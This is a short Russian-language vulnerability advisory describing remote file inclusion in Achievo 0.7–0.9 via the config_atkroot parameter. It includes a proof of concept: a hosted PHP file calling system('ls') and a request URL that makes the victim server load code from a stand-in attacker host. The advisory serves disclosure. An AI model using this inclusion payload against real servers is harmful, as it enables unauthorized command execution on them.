Achieva включает PHP сценарий, который используется для генерации JavaScript (class.atkdateattribute.js.php). Этот сценарий использует множество PHP include_once() инструкций, чтобы вызвать код, содержащийся в функциональных библиотеках. 

Нападающие могут изменять переменную $config_atkroot, которая определяет местоположение внешних файлов, и определять произвольное местоположение
скриптов, например указывать путь к PHP
сценарию на удаленном хосте. Успешная эксплуатация уязвимости позволяет удаленному атакующему выполнять команды с привилегиями процесса Web сервера. Пример: 

1. Создаем файл ls.txt и сохраняем его на своем Web сервере: 

<?php system('ls'); ?>

2. Вызываем уязвимый сценарий:

http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt? 

Уязвимость обнаружена в Achieva 0.7-0.9.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии